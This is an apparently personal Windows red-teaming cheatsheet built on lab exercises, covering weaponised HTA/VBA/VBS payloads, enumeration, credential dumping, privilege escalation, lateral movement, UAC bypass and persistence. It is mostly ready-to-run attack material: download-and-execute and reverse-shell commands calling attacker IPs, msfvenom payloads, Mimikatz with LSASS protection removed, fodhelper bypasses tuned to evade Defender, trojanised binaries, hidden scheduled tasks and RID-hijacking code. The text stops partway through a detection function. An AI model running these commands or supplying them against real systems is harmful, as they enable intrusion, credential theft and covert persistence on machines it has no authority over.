Zolaboo
Cheatsheet

Windows Red Teaming related shit

January 15, 2024

Weaponization (try them out at THM)

vbs

sample payload (Run takes the command, a window style and a wait flag: 0 = hidden window, 1 = normal window)

Set shell = WScript.CreateObject("WScript.Shell")
' the script's own path is appended as an argument only to show where it ran from
shell.Run "C:\Windows\System32\calc.exe " & WScript.ScriptFullName, 0, True
shell.Run "C:\Windows\System32\cmd.exe " & WScript.ScriptFullName, 1, True

run

  wscript hello.vbs
  ## any file extension works when the script engine is given explicitly
  wscript /e:VBScript payload.txt

hta

sample

<html>
<body>
<script>
	// var c= 'cmd.exe'
  var c = "powershell iwr -uri 'http://10.10.14.6/customshell.exe' -Outfile C:\\Windows\\Tasks\\a.exe;C:\\Windows\\Tasks\\a.exe -e cmd.exe"
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

generate payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o xxx.hta

Start the matching listener, serve the .hta over HTTP (e.g. python's http.server) and have the target open it; mshta.exe runs the embedded script.

metasploit create and serve hta

use exploit/windows/misc/hta_server

vba (Office macro)

basic payload: Document_Open (Word) and AutoOpen both fire when the document is opened, so either entry point calls EXECUTE

Sub Document_Open()
  EXECUTE
End Sub

Sub AutoOpen()
  EXECUTE
End Sub

' test version: just pops a message box
Sub EXECUTE()
   MsgBox ("Welcome to Weaponization Room!")
End Sub

' real version (keep only one EXECUTE in the module): run a command in a hidden window
Sub EXECUTE()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload, 0
End Sub

msfvenom

Note: msfvenom's -f vba output uses Workbook_Open, which only fires in Excel. For a Word document rename it to Document_Open; for Excel no change is needed.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba

powershell

With PowerCat

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c 10.10.10.10 -p 1337 -e cmd"

Enum

powershell

change keyboard layout

powershell -command "Set-WinUserLanguageList -Force 'fi-FI'"

check for antivirus/windows defender

wmic /namespace:\\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
Get-MpThreat

check for firewall

Get-NetFirewallProfile | Format-Table Name, Enabled

disable firewall (needs admin and writes event log entries; prefer a single allow rule when you can)

Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Get-NetFirewallProfile | Format-Table Name, Enabled

firewall rules

Get-NetFirewallRule | select DisplayName, Enabled, Description
Get-NetFirewallRule | findStr "Rule-name"

Test connection

Test-NetConnection -ComputerName 127.0.0.1 -Port 80
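The AV, Defender and firewall checks above are usually run one by one; the function below (an added example, not code from the original page) collects them into a single object so the posture check is one call. It assumes the community-documented layout of the SecurityCenter2 productState DWORD (middle byte 0x10/0x11 = enabled, last byte 0x00 = signatures current), which is not an official API, and runs as a normal user.

```powershell
# Added example, not from the original page: one function that collects the AV,
# Defender and firewall checks into a single object. Runs as a normal user.
# Assumption: productState decoding (middle byte 0x10/0x11 = enabled, last byte
# 0x00 = signatures current) follows the community-documented SecurityCenter2
# layout; Microsoft does not document it.
function Get-DefensePosture {
    [CmdletBinding()]
    param()

    # root/SecurityCenter2 only exists on workstation SKUs; servers throw here
    $avProducts = @()
    try {
        $avProducts = @(Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct -ErrorAction Stop |
            ForEach-Object {
                $hex = '{0:X6}' -f [int]($_.productState)
                [pscustomobject]@{
                    Name     = $_.displayName
                    State    = $hex
                    Enabled  = $hex.Substring(2, 2) -in @('10', '11')
                    Outdated = $hex.Substring(4, 2) -ne '00'
                    Exe      = $_.pathToSignedProductExe
                }
            })
    } catch {
        Write-Verbose "SecurityCenter2 not available (server SKU?): $_"
    }

    # Defender details; Get-MpComputerStatus fails when Defender is not installed
    $defender = $null
    try {
        $mp = Get-MpComputerStatus -ErrorAction Stop
        $defender = [pscustomobject]@{
            Service      = (Get-Service -Name WinDefend -ErrorAction SilentlyContinue).Status
            RealTime     = $mp.RealTimeProtectionEnabled
            AMSI         = $mp.AMServiceEnabled
            Tamper       = $mp.IsTamperProtected
            SignatureAge = $mp.AntivirusSignatureAge   # days since the last signature update
        }
    } catch {
        Write-Verbose "Defender cmdlets unavailable: $_"
    }

    # Per-profile state plus default actions: tells you whether a reverse shell
    # out or a bind shell in is going to be blocked
    $firewall = Get-NetFirewallProfile -ErrorAction SilentlyContinue |
        Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction

    [pscustomobject]@{
        Antivirus = $avProducts
        Defender  = $defender
        Firewall  = $firewall
    }
}

$posture = Get-DefensePosture
$posture.Antivirus | Format-Table -AutoSize
$posture.Defender  | Format-List
$posture.Firewall  | Format-Table -AutoSize
```

An empty Antivirus list on a server is expected (no SecurityCenter2 there), so check the Defender and Firewall parts before concluding the box is unprotected.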

EDR checkers

https://github.com/PwnDexter/Invoke-EDRChecker (PowerShell)
https://github.com/PwnDexter/SharpEDRChecker (C#)

network enum

netstat -na
arp -a
ipconfig
ipconfig /all

general

systeminfo
whoami /priv
whoami
whoami /groups

smb

net share

users

net user 
net group
net localgroup
net localgroup administrators

updates

wmic qfe get Caption,Description,HotFixID,InstalledOn

Credentials

Registry, shell history and AD descriptions

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
cat C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-AdUser -Filter * -Properties * | Select Name, Description

Mimikatz (needs privilege::debug or a SYSTEM shell first)

sekurlsa::logonpasswords

If that fails with an access denied (0x00000005) error, LSASS runs as a protected process (RunAsPPL). Load the mimikatz driver, strip the protection and retry; note that loading the driver creates a service and is very noisy:

!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

Credential Manager

Note: https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1

vaultcmd /list
VaultCmd.exe /listproperties:"Web Credentials"
powershell -ex bypass
Import-Module .\Get-WebCredentials.ps1
Get-WebCredentials

Stored credentials (runas can reuse them without knowing the password)

cmdkey /list
runas /savecred /user:THM.red\thm-local cmd.exe
LAPS

Check whether the LAPS client is installed, whether the AdmPwd module is available, and who is allowed to read the passwords for an OU

dir "C:\Program Files\LAPS\CSE"
Get-Command *AdmPwd*
Find-AdmPwdExtendedRights -Identity THMorg

active directory

Basic

Note: if RDP is available, open MMC (Run, mmc) and add the Active Directory snap-ins for a GUI view of the same data

systeminfo | findstr Domain
Get-ADUser -Filter *
Get-ADUser -Filter * -SearchBase "CN=Users,DC=THMREDTEAM,DC=COM"
Get-ADUser -Filter * -SearchBase "OU=THM,DC=THMREDTEAM,DC=COM"
Get-ADUser -Identity gordon.stevens -Server za.tryhackme.com -Properties * 
Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A
Get-ADGroup -Identity Administrators -Server za.tryhackme.com
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com
Get-ADDomain -Server za.tryhackme.com

## Change password of user 
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)

dir \\za.tryhackme.com\SYSVOL\
net user /domain
net user zoe.marshall /domain
net group /domain
net group "Tier 1 Admins" /domain
net accounts /domain

Event Log / Sysmon

Get-EventLog -List
Get-Process | Where-Object { $_.ProcessName -like "Sysmon*" }
Get-Service | where-object {$_.DisplayName -like "*sysm*"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
## find the Sysmon config on disk and read its ProcessCreate rules: whatever is excluded is a blind spot
findstr /si /C:"ProcessCreate onmatch=" C:\tools\*

applications / services

wmic product get name,version
Get-ChildItem -Hidden -Path C:\Users\xxx\Desktop\
net start
wmic service where "name like 'THM Service'" get Name,PathName
Get-Process -Name "thm-service"
netstat -noa |findstr "LISTENING" |findstr "PID"

dns zone transfer

nslookup
--> server 10.10.5.186
--> ls -d thmredteam.com

Priv esc

Good automation scripts (these can be noisy)

  • https://github.com/bitsadmin/wesng
  • https://github.com/itm4n/PrivescCheck
  • https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
  • multi/recon/local_exploit_suggester (metasploit)

Files to check

  • C:\Unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml
  • C:\ProgramData\McAfee\Agent\DB\ma.db
  • %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Saved credentials

cmdkey /list
runas /savecred /user:admin cmd.exe
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

quick wins (ctf style)

Check the scheduled tasks and whether we can write to the file any of them executes

## List of tasks
schtasks
## Info about specific task (eg. pathname)
schtasks /query /tn vulntask /fo list /v
## Check write access
icacls c:\tasks\schtask.bat
## try to run task
schtasks /run /tn vulntask

Check AlwaysInstallElevated

If AlwaysInstallElevated is 1 under both HKCU and HKLM, any user can install an MSI as SYSTEM; one key alone is not enough

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f msi -o malicious.msi

Execute

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Services

If we can write to the location of a service executable, overwrite it and get a shell/session when the service (re)starts

Also check the BINARY_PATH_NAME property for quotes: if the path is unquoted and contains spaces, Windows tries each space-separated prefix as the executable before the real one, so dropping a binary at one of those prefixes hijacks the service

EG

BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

is resolved as

C:\MyPrograms\Disk.exe (remaining text becomes arguments), then C:\MyPrograms\Disk Sorter.exe

and so on, until the real binary is reached
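The candidate list Windows walks for an unquoted path is easy to get wrong by hand, so here is an added example (not from the original page) that reproduces the CreateProcess lookup order for any service path and then probes whether the candidate's directory is writable by the current user. Services under C:\Windows are skipped because that tree is not user-writable; everything else is an assumption of this example, not of the page.

```powershell
# Added example, not from the original page. Get-UnquotedPathCandidates reproduces the
# CreateProcess lookup order for an unquoted path with spaces (each prefix up to a
# space, with .exe appended); Find-UnquotedServicePath applies it to every service and
# tests whether the candidate's directory is writable by creating and deleting a probe file.
function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)

    # Drop service arguments after the binary, then bail out if the path is
    # already quoted or has no spaces to abuse (-split is case-insensitive)
    $bin = (($PathName -split '\.exe', 2)[0] + '.exe').Trim()
    if ($bin.StartsWith('"') -or $bin -notmatch ' ') { return @() }

    $parts = $bin -split ' '
    # "C:\A B\c.exe" is tried as "C:\A.exe" before "C:\A B\c.exe"
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ([IO.Path]::GetRandomFileName())
    try {
        # A real write beats reading ACLs, which miss inherited and deny entries
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' } |
        ForEach-Object {
            $svc = $_
            foreach ($cand in Get-UnquotedPathCandidates -PathName $svc.PathName) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    StartMode = $svc.StartMode
                    Candidate = $cand
                    Writable  = Test-DirectoryWritable -Path (Split-Path -Path $cand -Parent)
                }
            }
        }
}

# Constructed sample, the path from the text above
Get-UnquotedPathCandidates -PathName 'C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe'

# Live run: rows with Writable = True and RunsAs = LocalSystem are the ones to chase
Find-UnquotedServicePath | Format-Table -AutoSize
```

For the sample path the function lists the Disk.exe and Disk Sorter.exe candidates in the order Windows tries them. The write probe leaves a short-lived file behind, so expect a file-creation event if the host is monitored.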

Also check with accesschk whether the service object itself is writable by us (SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG); if so, we can repoint it without touching the binary

See config

sc qc apphostsvc

Edit config (might not have rights)

sc config THMService binPath= "C:\Users\thm-unpriv\Desktop\rev-svc.exe" obj= LocalSystem

Registry

Each service has a key under

HKLM\SYSTEM\CurrentControlSet\Services\<service>

ImagePath = the binary the service runs, ObjectName = the account it runs as. If the key is writable, repoint ImagePath; otherwise check whether the binary in ImagePath is writable

icacls C:\PROGRA~2\SYSTEM~1\WService.exe

Generate service payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f exe-service -o rev-svc.exe

Overwrite service with our payload

cp C:\Users\thm-unpriv\Desktop\rev-svc.exe WService.exe

Give permissions to our new payload

icacls WService.exe /grant Everyone:F

Restart our service if we can

## On cmd.exe
sc stop windowsscheduler
sc start windowsscheduler

Privilege abusing

Check with

whoami /priv

SeBackupPrivilege / SeRestorePrivilege

First copy the hive files:

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

Send them to the attacker host (eg. smb):

copy C:\Users\THMBackup\sam.hive \\10.11.23.111\public\
copy C:\Users\THMBackup\system.hive \\10.11.23.111\public\

Use impacket's secretsdump to dump the hashes:

secretsdump.py -sam sam.hive -system system.hive LOCAL

Use the hashes (eg. pass-the-hash with Impacket's psexec):

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 administrator@10.10.121.162

SeTakeOwnership

Abuse Utilman.exe (run from C:\Windows\System32)

Take ownership of the file
takeown /f C:\Windows\System32\Utilman.exe
Grant yourself full control
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
Replace Utilman with cmd
copy cmd.exe utilman.exe

After these steps lock the screen and press the Ease of Access button: the replaced Utilman runs as SYSTEM on the logon screen

SeImpersonate / SeAssignPrimaryToken

Usually held by service accounts (IIS, MSSQL). The "Potato" family abuses it to get SYSTEM: JuicyPotato on older builds (up to Server 2016 / Windows 10 1803), RoguePotato on newer ones

Unpatched Software

Check installed products

wmic product get name,version,vendor

Then look up CVEs for those versions online

Pivoting

Running commands as another user

PSExec

Note: PsExec is part of the Sysinternals suite (https://learn.microsoft.com/sysinternals/downloads/psexec). Note2: local admin on the target is usually needed. Port: 445/TCP (SMB)

psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

WinRS

When WinRM is enabled Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

Powershell

Note: files can be uploaded to the target first, e.g. with smbclient to the admin$ share, which maps to C:\Windows:

smbclient -c 'put myinstaller.msi' -U username -W ZA '//thmiis.za.tryhackme.com/admin$/' password
 putting file myinstaller.msi as \myinstaller.msi

Build a credential object:

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

After that

Enter-PSSession -Computername TARGET -Credential $credential

OR

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

WMI

$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}

INSTALL MSI

Generate with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=lateralmovement LPORT=4445 -f msi > bolainstaller.msi

INSTALL:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

WMI (LEGACY)

wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" 

sc

Ports: 135/TCP and 49152-65535/TCP (DCE/RPC), 445/TCP and 139/TCP (RPC over SMB named pipes)

Administrator required

Note: sc.exe fails from an SSH session; spawn another shell (eg netcat) before using it

Start:
sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto
sc.exe \\TARGET start THMservice
Shut down:
sc.exe \\TARGET stop THMservice
sc.exe \\TARGET delete THMservice

scheduled tasks

Same restrictions as sc

To start:
schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 

schtasks /s TARGET /run /TN "THMtask1" 
To shutdown:
schtasks /S TARGET /TN "THMtask1" /DELETE /F

UAC BYPASS

Automatic script

Note: Akagi https://github.com/hfiref0x/UACME

Via fodhelper.exe

Note: Defender has a signature for this and removes the registry keys as soon as they are written

Get a reverse shell

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f
fodhelper.exe

Defender bypass 1 (be fast, unreliable)

Same keys as above, but the command is chained with a registry query (or with fodhelper itself) so the payload fires before Defender has cleaned the key up

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
## THIS 
reg add %REG_KEY% /d %CMD% /f & reg query %REG_KEY%
fodhelper.exe
## OR THIS
 reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

Cleanup

reg delete HKCU\Software\Classes\ms-settings\ /f

Defender bypass 2 (cmd.exe)

Execute

set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.10.224.43:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe

Cleanup

reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

Scheduled tasks and env variables

The SilentCleanup task (under \Microsoft\Windows\DiskCleanup) runs %windir%\system32\cleanmgr.exe with highest privileges and can be started by any user. Overriding windir in HKCU\Environment makes it run our command instead; trigger it with schtasks /run on that task name

reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4446 EXEC:cmd.exe,pipes &REM " /f

Cleanup

reg delete "HKCU\Environment" /v "windir" /f

Persistence

Also check out:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md

Add user to admin group

net localgroup administrators thmuser0 /add

Add to Backup Operators group

Note: Backup Operators can read any file on the machine (SAM and SYSTEM hives included), which is effectively admin. The user is also added to Remote Management Users so it can log in over WinRM. With UAC on, local accounts get a filtered non-admin token over the network, so LocalAccountTokenFilterPolicy=1 is set to turn that filtering off

Setup

net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

After login (using Evil-WinRM )

Get sam & system files
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
Dump hashes
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Special privileges

We basically add SeBackupPrivilege and SeRestorePrivilege to our account through the local security policy

Export current config for editing

secedit /export /cfg config.inf
notepad config.inf

Append our username to the SeBackupPrivilege and SeRestorePrivilege lines in the [Privilege Rights] section

Note: the existing entries are SIDs prefixed with *, but a plain username is accepted

Import our new config

secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf

Modify the WinRM session configuration so our user can log in via WinRM

Add our user and give it Full Control in the security descriptor UI that opens

Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

RID Hijacking

We change the RID stored in the SAM for our user to 500, so at logon the system builds the Administrator's token for that user (the password stays ours)

Find RID for our user

Note: the RID is the number after the last - of the SID

wmic useraccount get name,sid

Edit our registry value

Note: the SAM hive is only readable and writable as SYSTEM, so start regedit through PsExec64

Open Registry Editor
PsExec64.exe -i -s regedit
Navigate to the user's key

Note: the key name is the RID as 8 hex digits (e.g. 1010 = 000003F2)

HKLM\SAM\SAM\Domains\Account\Users\<RID in hex>
Edit the F value
The RID sits at offset 0x30 as a little-endian DWORD; change the bytes there to F4 01 (500 in decimal)

Now we can login via RDP
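Editing the F value by hand in regedit is error-prone, so this added example (not code from the original page) does the byte manipulation as pure functions that can be checked on a constructed blob before the live SAM is touched. It assumes, as the technique itself does, that the RID is the little-endian DWORD at offset 0x30 of F; the 80-byte sample blob is constructed here.

```powershell
# Added example, not from the original page. Pure byte manipulation for the F value
# described above. Assumption: the RID is the little-endian DWORD at offset 0x30.
function Get-SamUserKeyName {
    # Keys under ...\Users are named with the RID as 8 upper-case hex digits
    param([Parameter(Mandatory)][uint32]$Rid)
    '{0:X8}' -f $Rid
}

function Get-SamFValueRid {
    param([Parameter(Mandatory)][byte[]]$FValue)
    [BitConverter]::ToUInt32($FValue, 0x30)
}

function Set-SamFValueRid {
    param(
        [Parameter(Mandatory)][byte[]]$FValue,
        [Parameter(Mandatory)][uint32]$NewRid
    )
    $RidOffset = 0x30
    if ($FValue.Length -lt $RidOffset + 4) {
        throw "F value is only $($FValue.Length) bytes; the RID field at 0x30 is missing"
    }
    # Work on a copy so the caller keeps the original for rollback
    $patched = [byte[]]$FValue.Clone()
    $le = [BitConverter]::GetBytes($NewRid)       # little-endian on x86/x64
    [Array]::Copy($le, 0, $patched, $RidOffset, 4)
    ,$patched                                     # keep it a byte[] on output
}

# Constructed 80-byte F blob whose RID field holds 1010 (0x3F2)
$sample = New-Object byte[] 80
[Array]::Copy([BitConverter]::GetBytes([uint32]1010), 0, $sample, 0x30, 4)

$patched = Set-SamFValueRid -FValue $sample -NewRid 500
'key {0}: RID {1} -> {2}, bytes at 0x30 now {3}' -f (Get-SamUserKeyName 1010),
    (Get-SamFValueRid $sample), (Get-SamFValueRid $patched),
    (($patched[0x30..0x33] | ForEach-Object { '{0:X2}' -f $_ }) -join ' ')

# Live use, only from a SYSTEM shell (PsExec64.exe -i -s powershell.exe), since
# the SAM hive is not readable by administrators:
# $key = "HKLM:\SAM\SAM\Domains\Account\Users\$(Get-SamUserKeyName 1010)"
# $f   = (Get-ItemProperty -Path $key -Name F).F
# Set-ItemProperty -Path $key -Name F -Value (Set-SamFValueRid -FValue $f -NewRid 500)
```

Keep the original F bytes: writing them back is the only clean way to undo the hijack, and a mismatched RID is visible in the SAM to anyone who compares the key name with the F value.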

Backdoors via files

Replace a commonly used program (eg. putty.exe) with a trojanised version (-k keeps the original functionality):

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

Edit a shortcut to execute the malicious program

Create a small script that starts our backdoor and then the program the user expects; store it as C:\Windows\System32\backdoor.ps1 for example:

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe IP 4445"
C:\Windows\System32\calc.exe

Then point the shortcut's target at the script

Note: you may need to restore the original icon afterwards to be less noticeable.

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Hijacking file associations

This way our backdoor runs every time a file with a certain extension is opened

Sample backdoor file (starts the shell, then opens the file in notepad so the user notices nothing)

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]

Find the extension's ProgID in registry editor

Note: .txt is the example

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.txt

The ProgID is the (Default) value's data (txtfile for .txt)

Find the shell command of the ProgID

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\{PROGID}\shell\open\command

Change the (Default) value so it executes our backdoor with the opened file as argument (%1 is what $args[0] receives)

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1 %1
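HKLM\SOFTWARE\Classes is not always the key that wins: a per-user UserChoice or an HKCU\Software\Classes entry overrides it. The function below is an added example, not code from the original page; it resolves which handler command Windows will actually run for an extension by walking that precedence, so you can pick the right ProgID before the hijack and confirm the new command is the effective one afterwards. It is read-only and runs as any user; the list of interpreter names it flags is this example's own heuristic.

```powershell
# Added example, not from the original page: resolve the effective "open" command
# for an extension. Precedence: per-user UserChoice, then the merged HKCR view
# (HKCU\Software\Classes over HKLM\Software\Classes). Read-only.
function Get-FileAssociationCommand {
    param([Parameter(Mandatory)][string]$Extension)
    if (-not $Extension.StartsWith('.')) { $Extension = ".$Extension" }

    # Explorer's per-user choice overrides the Classes default
    $userChoice = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$Extension\UserChoice"
    $progId = (Get-ItemProperty -Path $userChoice -ErrorAction SilentlyContinue).ProgId
    $source = 'HKCU UserChoice'
    if (-not $progId) {
        $progId = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$Extension" -ErrorAction SilentlyContinue).'(default)'
        $source = 'HKCR (HKCU\Software\Classes merged over HKLM\Software\Classes)'
    }
    if (-not $progId) { return $null }

    $cmdKey  = "Registry::HKEY_CLASSES_ROOT\$progId\shell\open\command"
    $command = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'

    [pscustomobject]@{
        Extension    = $Extension
        ProgId       = $progId
        ProgIdSource = $source
        CommandKey   = $cmdKey
        Command      = $command
        # A script host in the handler is what the hijack above looks like (heuristic)
        Interpreter  = [bool]($command -match 'powershell|cmd\.exe|wscript|cscript|mshta|rundll32')
    }
}

'.txt', '.pdf', '.jpg', '.docx' | ForEach-Object { Get-FileAssociationCommand -Extension $_ } |
    Format-List
```

Store-app handlers (ProgIds starting with AppX) have no shell\open\command, so Command comes back empty for them; that is expected, not a broken association.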

Services create

Generate service executable (eg with msfvenom)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

Create service and start it

sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2

Service modify

The plan is to find a stopped service with START_TYPE automatic and repoint its binary; SERVICE_START_NAME is the account the service runs as, so pick one running as LocalSystem

Find a stopped service

sc.exe query state=all

See service properties

sc.exe qc THMService3

Edit service

sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"

Scheduled tasks

Create task

schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.10.90.206 4449" /ru SYSTEM

Make task invisible

Task Scheduler and schtasks only list tasks whose security descriptor they can read, so deleting the SD value hides the task from both while it keeps running

Edit the registry value (needs SYSTEM, e.g. regedit through PsExec64 -s)

Location:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{TASKNAME}

Delete the SD value
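The same registry tree gives the detection side of this trick. The function below is an added example, not code from the original page: it walks TaskCache\Tree, flags task entries whose SD value is missing, and compares the tree against what Get-ScheduledTask is willing to show. It assumes the documented Tree layout (task nodes carry Id, Index and SD; folder nodes do not) and needs an elevated shell to read the key.

```powershell
# Added example, not from the original page: find scheduled tasks that exist in the
# TaskCache registry tree but have no SD value or are not returned by the Task
# Scheduler API. Needs an elevated shell to read TaskCache\Tree.
function Find-HiddenScheduledTask {
    $tree = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'

    # What the Task Scheduler API admits to, keyed by "\Folder\Name"
    $visible = @{}
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        ForEach-Object { $visible[$_.TaskPath + $_.TaskName] = $true }

    Get-ChildItem -Path $tree -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath
        # Folder nodes have no Id; task nodes carry Id (GUID), Index and normally SD
        if (-not $props.PSObject.Properties['Id']) { return }

        $taskPath = $_.Name -replace '^.*\\TaskCache\\Tree', ''
        [pscustomobject]@{
            TaskPath = $taskPath
            Id       = $props.Id
            HasSD    = [bool]$props.PSObject.Properties['SD']
            Listed   = $visible.ContainsKey($taskPath)
        }
    }
}

# Anything with HasSD = False or Listed = False deserves a look at the
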